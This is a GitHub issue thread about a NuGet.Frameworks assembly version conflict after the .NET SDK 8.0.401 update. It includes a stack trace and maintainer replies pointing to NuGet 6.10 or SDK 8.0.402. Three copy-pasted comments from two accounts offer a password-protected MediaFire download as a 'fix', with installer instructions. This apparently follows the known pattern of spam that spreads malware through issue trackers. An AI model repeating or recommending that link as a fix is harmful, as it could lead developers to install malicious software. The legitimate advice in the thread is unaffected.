### ISSUE TITLE
Version conflict with Nuget.Frameworks.dll in .Net SDK 8.0.401

### ISSUE THREAD

**Issue by stiwa-werm** [NuGet/Home#13746]
### NuGet Product Used

MSBuild.exe

### Product Version

.NET SDK 8.0.401

### Worked before?

.NET SDK 8.0.304

### Impact

It's more difficult to complete my work

### Repro Steps & Context

We are using MSBuild in our project. There is a version conflict with newest .Net 8 SDK (8.0.401) which comes with Visual Studio because of Nuget.Framworks.dll. We are using Nuget.Frameworks.dll from the nuget.org with version 6.11.0.119, SDK uses 6.11.0.122 which is not available on nuget.org.
The version conflict happened, after updating Visual Studio from 17.10.x to 17.11.x (with SDK update from 8.0.3xx to 8.0.4xx). Search for new version on Nuget.org not succesfull. SDK version not available on nuget.org. Manual project reference to nuget.frameworks assembly of SDK no solution for us.

### Verbose Logs

```shell
System.IO.FileLoadException: Could not load file or assembly 'NuGet.Frameworks, Version=6.11.0.122, Culture=neutral, PublicKeyToken=31bf3856ad364e35'. Could not find or load a specific file. (0x80131621)
File name: 'NuGet.Frameworks, Version=6.11.0.122, Culture=neutral, PublicKeyToken=31bf3856ad364e35'
 ---> System.IO.FileLoadException: Could not load file or assembly 'NuGet.Frameworks, Version=6.11.0.122, Culture=neutral, PublicKeyToken=31bf3856ad364e35'.
   at System.Runtime.Loader.AssemblyLoadContext.LoadFromAssemblyPath(String assemblyPath)
   at Microsoft.Build.Shared.MSBuildLoadContext.Load(AssemblyName assemblyName)
   at System.Runtime.Loader.AssemblyLoadContext.ResolveUsingLoad(AssemblyName assemblyName)
   at System.Runtime.Loader.AssemblyLoadContext.Resolve(IntPtr gchManagedAssemblyLoadContext, AssemblyName assemblyName)
   at Microsoft.NET.Build.Tasks.ProcessFrameworkReferences.<>c.<AddPacksForFrameworkReferences>b__217_0(ITaskItem item)
```

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Gambero81** [comment]
same problem for me. After update vs from 17.10 to 17.11 i have the same error using `MSBuildWorkspace` and `Roslyn`:  

```
var workspace = MSBuildWorkspace.Create()
var solution = await workspace.OpenSolutionAsync(solutionFilePath);
```

after this line of code, if i watch workspace.Diagnostics i can see a lot of errors relative to

```
Could not find or load a specific file. (0x80131621)
File name: 'NuGet.Frameworks, Version=6.11.0.122, Culture=neutral, PublicKeyToken=31bf3856ad364e35'
```

updating `NuGet.Framework` package does not solve the issue (last version available is 6.11.0.119 !!!).

This is a very locking issue, the only workaround is to use previous .NET SDK version

**Comment by kartheekp-ms** [comment]
We plan to address the version conflict issue in the very near future. Until then, please refer to version `6.10` of the NuGet.Frameworks package, as there haven't been any changes to that package in `6.11`.

**Comment by zivkan** [comment]
The .NET 8.0.402 SDK was released on Tuesday. Both it, and whatever the version of VS 17.11 is, now both contain the same assembly version of all NuGet dlls.

I'm still in the process of releasing NuGet's packages to nuget.org, but using an older package version (so, lower assembly version) shouldn't cause any problems.

> This is a very locking issue, the only workaround is to use previous .NET SDK version

Unless I misunderstand something, you could also downgrade to an older version NuGet.Framework, such as 6.10.0. That way the .NET SDK contains a higher assembly version, and there won't be assembly load errors.
